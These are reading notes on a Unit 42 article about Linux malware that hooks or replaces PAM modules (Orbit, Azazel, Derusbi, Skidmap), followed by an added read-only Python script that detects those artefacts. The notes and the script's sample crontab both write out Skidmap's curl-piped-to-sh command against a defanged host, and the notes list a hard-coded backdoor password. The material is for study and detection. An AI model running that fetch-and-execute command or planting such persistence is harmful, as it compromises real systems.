When PAM Goes Rogue: Malware Uses Authentication Modules for Mischief
by Siddharth Sharma
Unit 42/Palo Alto Networks, 2023
https://unit42.paloaltonetworks.com/linux-pam-apis/
| Notes |
|---|
| PAM |
| PAM API hooking |
| Advanced WildFire for Linux |
| passwd, shadow files. |
| pam_unix |
| libpam |
| Orbit malware |
| Orbit was discovered in 2022 |
| hooks pam_open_session, pam_authenticate, and pam_acct_mgmt |
| pam_open_session initiates a new session for the user on successful authentication |
| pam_authenticate handles the user authentication process |
| pam_acct_mgmt manages user account information; account has expired, user is allowed to access system at a specific time, … |
| logs credentials to a file |
| https://intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ |
| Azazel rootkit |
| open-source |
| targets older Linux kernels |
| LD_PRELOAD |
| hooks pam_open_session, pam_authenticate, and pam_acct_mgmt |
| 2ad5993cf4db52ef72e299590d79dd7414bc3b119f5d8be8274ad89bec4cbbae |
| Derusbi malware |
| targets Linux and Windows |
| LD_PRELOAD |
| https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.12.15.Newcomers_in_the_Derusbi_family/Newcomers-in-the-Derusbi-family.pdf |
| Skidmap malware |
| first seen 2019 |
| replaces pam_unix.so with a malicious copy |
| https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html |
| cryptocurrency-mining malware |
| LD_PRELOAD rootkit |
| cybercrime |
| installs as a crontab: */1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh \| sh |
| pm.sh downloads a binary named “pc” using wget or curl |
| uses setenforce 0 to disable SELinux |
| adds SELINUX=disabled, SELINUXTYPE=targeted to /etc/selinux/conf |
| adds a public key to SSH authorized_keys file |
| replaces pam_unix.so with a malicious copy |
| sets root’s .ssh/authorized_keys file immutable using system() |
| hard-coded password in pam_unix: Mtm$%889*G*S3%G |
| “user:password@host –> %s %s\n” string |
| logs to /usr/include/ilog.h |
| writes payload to /tmp/miner2 |
| uses tar command |
| decrypts malicious payload using openssl command |
| replaces ‘rm’ command with one that re-installs crontab persistence |
| /usr/bin/kaudited drops and installs an LKM rootkit |
| uses different modules for specific kernel versions to avoid crashing the host |
| installs a watchdog app for its miner component |
| iproute module hooks getdents to hide specific files and directories |
| “hacked_getdents” |
| netlink module fakes network traffic statistics related to certain IP addresses and ports and CPU usage of some processes (pamdicks process) |
| Indicators of Compromise (IoCs) |
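Added example (my own code, not from the Unit 42 article or any of the reports linked above): host-side checks for the artefacts the notes describe, covering both the LD_PRELOAD PAM-hooking pattern (Orbit, Azazel, Derusbi) and the Skidmap persistence chain (curl-piped-to-sh crontab, replaced pam_unix.so, immutable root authorized_keys). Every input is a constructed sample embedded inline so the script runs offline; the library path /usr/local/lib/libhook.so and the hashes are placeholders, and the expected pam_unix.so digest would in practice come from the distribution package (rpm -V / dpkg --verify or a golden-image baseline).

```python
"""Host-artefact checks for PAM hooking and the persistence techniques noted above.
Added example, not the article's code; all inputs are constructed samples."""
import hashlib
import re
from typing import Dict, List

# PAM entry points that the hooking malware in the notes interposes on.
PAM_HOOK_TARGETS = {"pam_authenticate", "pam_open_session", "pam_acct_mgmt"}

# A download command whose output is piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|da)?sh\b")

# --- constructed samples (not real host data) -------------------------------
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh
"""
SAMPLE_LD_SO_PRELOAD = "/usr/local/lib/libhook.so\n"          # hypothetical path
SAMPLE_NM_EXPORTS = ["_init", "pam_authenticate", "pam_open_session", "pam_acct_mgmt"]
SAMPLE_MODULE_BYTES = b"not the real pam_unix.so"             # stands in for the file on disk
SAMPLE_EXPECTED_SHA256 = hashlib.sha256(b"pristine pam_unix.so").hexdigest()  # placeholder baseline
SAMPLE_LSATTR = "----i---------e------- /root/.ssh/authorized_keys"


def find_pipe_to_shell(crontab_text: str) -> List[str]:
    """Return non-comment crontab lines that fetch a remote script and pipe it to sh."""
    hits = []
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        if PIPE_TO_SHELL.search(line):
            hits.append(line.strip())
    return hits


def preload_libraries(ld_so_preload_text: str) -> List[str]:
    """List every library named in /etc/ld.so.preload; on a clean host the file usually does not exist."""
    libs: List[str] = []
    for line in ld_so_preload_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            libs.extend(line.split())
    return libs


def suspicious_pam_exports(library_path: str, exported_symbols: List[str]) -> List[str]:
    """Flag PAM entry points exported by a library that is not libpam itself.

    exported_symbols is the symbol list you would get from `nm -D <lib>`. An
    LD_PRELOAD hook must export the same names as libpam so the dynamic loader
    resolves callers to the preloaded copy first; a non-libpam library doing so
    is the signature of the hooking in the notes above.
    """
    if re.search(r"/libpam\.so", library_path):
        return []
    return sorted(PAM_HOOK_TARGETS.intersection(exported_symbols))


def pam_unix_modified(module_bytes: bytes, expected_sha256: str) -> bool:
    """True when pam_unix.so on disk no longer matches the package-manager baseline."""
    return hashlib.sha256(module_bytes).hexdigest() != expected_sha256.lower()


def authorized_keys_immutable(lsattr_line: str) -> bool:
    """Parse one `lsattr` output line; a lowercase 'i' flag means chattr +i was applied."""
    flags, _, path = lsattr_line.partition(" ")
    return "i" in flags and path.endswith("authorized_keys")


def run_checks() -> Dict[str, object]:
    """Run every check over the constructed samples and return the findings."""
    return {
        "cron_pipe_to_shell": find_pipe_to_shell(SAMPLE_CRONTAB),
        "ld_so_preload": preload_libraries(SAMPLE_LD_SO_PRELOAD),
        "pam_hooks_in_preload": suspicious_pam_exports(
            SAMPLE_LD_SO_PRELOAD.strip(), SAMPLE_NM_EXPORTS
        ),
        "pam_unix_modified": pam_unix_modified(SAMPLE_MODULE_BYTES, SAMPLE_EXPECTED_SHA256),
        "authorized_keys_immutable": authorized_keys_immutable(SAMPLE_LSATTR),
    }


if __name__ == "__main__":
    for name, result in run_checks().items():
        print(f"{name}: {result}")
```

On a real host the inputs would be the root crontab (`crontab -l -u root`), the contents of /etc/ld.so.preload plus the LD_PRELOAD variable of long-running processes, `nm -D` over each preloaded library, the bytes of the pam_unix.so path reported by `find /lib* /usr/lib* -name pam_unix.so`, and `lsattr` over root's authorized_keys; the checks are deliberately read-only so they can run from an incident-response script without changing the evidence.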